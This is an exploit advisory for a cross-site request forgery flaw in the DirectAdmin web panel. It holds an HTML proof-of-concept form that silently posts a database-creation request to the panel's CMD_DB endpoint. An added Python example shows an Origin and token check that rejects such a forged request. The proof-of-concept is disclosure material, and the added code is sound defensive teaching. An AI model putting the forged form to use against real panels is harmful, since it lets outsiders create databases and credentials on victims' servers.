#############################################################
DirectAdmin Web Panel XSRF Vulnerability
#############################################################
# Author : SENCER HAN
# Date : 11.07.2011
# Name : DirectAdmin Web Panel
# Bug Type : XSRF Vulnerability
expl0itc0de :
<codehunters>
<form name=reseller action=http://site.com:2222/CMD_DB method=post>
<input type=hidden name=action value=create>
<table>
<tr><td class=list>Database Name:</td><td class=list><b></b><input type=text name=name size=12></td></tr>
<tr><td class=list>Database Username:</td><td class=list><b></b><input type=text name=user size=12></td></tr>
<tr><td class=list>Username Password:</td><td class=list><input type=password name=passwd size=20> <input type=button value=Random onClick=randomPass()></td></tr>
<tr><td class=list>Confirm Password:</td><td class=list><input type=password name=passwd2 size=20></td></tr>
<tr><td class=list>
<input type=submit name=create value=Create>
</td></tr>
</table>
</form>
</codehunters>
#############################################################
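
Added example, not part of the original advisory and not DirectAdmin code: a server-side check that rejects a state-changing POST such as the CMD_DB form above unless it comes from the panel's own origin and carries a per-session token. The names PANEL_ORIGINS, SECRET, csrf_token, issue_token and allow_request, and the hostnames, are assumptions made for illustration.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

PANEL_ORIGINS = {"https://panel.example.test:2222"}  # assumed panel origin (placeholder)
SECRET = b"constructed-demo-key"                     # per-deployment secret (constructed)

def origin_of(url):
    """Return scheme://host[:port] for a URL, or None when it has no scheme/host."""
    parts = urlsplit(url or "")
    if not parts.scheme or not parts.netloc:
        return None                                  # also covers the literal Origin "null"
    return f"{parts.scheme}://{parts.netloc}".lower()

def issue_token(session_id):
    """Token bound to the session; only forms rendered by the panel itself contain it."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def allow_request(method, headers, form, session_id):
    """Decide whether a request may change state. Returns (allowed, reason)."""
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"
    # 1. Origin check: browsers attach Origin to cross-site POSTs; fall back to Referer.
    source = origin_of(headers.get("Origin") or headers.get("Referer"))
    if source is None:
        return False, "no usable Origin/Referer"
    if source not in PANEL_ORIGINS:
        return False, f"cross-site origin {source}"
    # 2. Token check: a third-party page cannot read the victim's token.
    sent = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(sent, issue_token(session_id).encode()):
        return False, "bad or missing token"
    return True, "ok"

# Constructed sample: the POST a browser would send for the form in the advisory
# when that form is hosted on a third-party page.
FORGED = dict(method="POST",
              headers={"Origin": "http://attacker.example.test"},
              form={"action": "create", "name": "db1", "user": "u1",
                    "passwd": "x", "passwd2": "x", "create": "Create"},
              session_id="sess-123")

if __name__ == "__main__":
    print(allow_request(**FORGED))
```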